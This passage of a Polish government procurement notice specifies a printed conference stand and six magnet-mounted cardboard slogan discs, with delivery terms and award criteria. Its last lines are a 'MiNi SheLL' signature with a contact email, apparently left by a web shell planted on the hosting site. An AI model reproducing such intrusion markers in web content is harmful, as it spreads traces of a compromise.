musi mieć odpowiednie mocowania elementów wymiennych, tzw. hangerów z napisami. Elementy te mogą być przyczepiane za pomocą magnesów lub rzepów. Jednakże, mocowania te muszą utrzymywać wymienne elementy i zapewnić ich użytkowanie przez wszystkie dni konferencji.
elementy wymienne nie mogą być zbyt ciężkie.
a Stand z podparciem i dwoma wycięciami na głowę
Ilość: 1 sztuka
Wymiary: 200x199 cm
Zadruk: 4+0 (CMYK)
Pokrycie: folia matowa 
b Wymienne elementy - tzw. hangery z nadrukowanymi hasłami
Ilość: 6 sztuk
Kształt: koło o średnicy 44cm
Materiał: karton o grubości 2-3mm pokryty matową folią 
Zadruk: 4+0 (CMYK)
Rodzaj mocowania: magnesy lub rzepy

Termin realizacji: 15 dni roboczych.
W dniu podpisania umowy Wykonawca przekaże Zamawiającemu dokładną specyfikację techniczną na podstawie której Zamawiający przygotuje projekty wszystkich materiałów promocyjnych. 
3. Projekty o których mowa w punkcie 2 zostaną przekazane najpóźniej w ciągu 4 dni od momentu otrzymania pełnej specyfikacji. 
4. Projekty zostaną przekazane Wykonawcy poprzez wgranie na udostępniony Zamawiającemu ftp.
5. W projektach należy użyć czcionkę Planer w odmianie Regular (OTF).
6. Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com